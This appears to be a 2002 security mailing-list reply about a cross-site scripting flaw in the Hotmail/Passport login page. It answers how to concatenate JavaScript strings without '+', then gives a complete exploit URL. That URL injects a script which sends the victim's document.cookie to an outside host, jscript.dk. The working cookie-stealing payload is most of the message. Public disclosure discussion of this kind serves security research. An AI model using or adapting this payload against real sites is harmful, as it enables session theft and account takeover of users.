> From: Russell Harding [mailto:hardingr@cunap.com] > Is there another way to exploit this which I am not > seeing? Or does MSN actually have their act together > (in this particular case...)? > > -Russell > > P.S. Well, I suppose the real question may be this: > Is there a way to concatenate javascript strings without "+" or "%2B"? Sure there is, the first that springs to mind is to use the replace method which all strings have: var myString = "hi $".replace('$','monkeyboy'); alert( myString ); // alerts "hi monkeyboy" The first argument can be both a string or a regular expression. http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";><sc ript>location.replace('http://jscript.dk/2002/10/sec/querystring.asp?$'.repl ace('$',document.cookie));</script>&ct=1033054530&_setlang=",,-1,0,,,, Regards Thor Larholm Jubii A/S - Internet Programmer
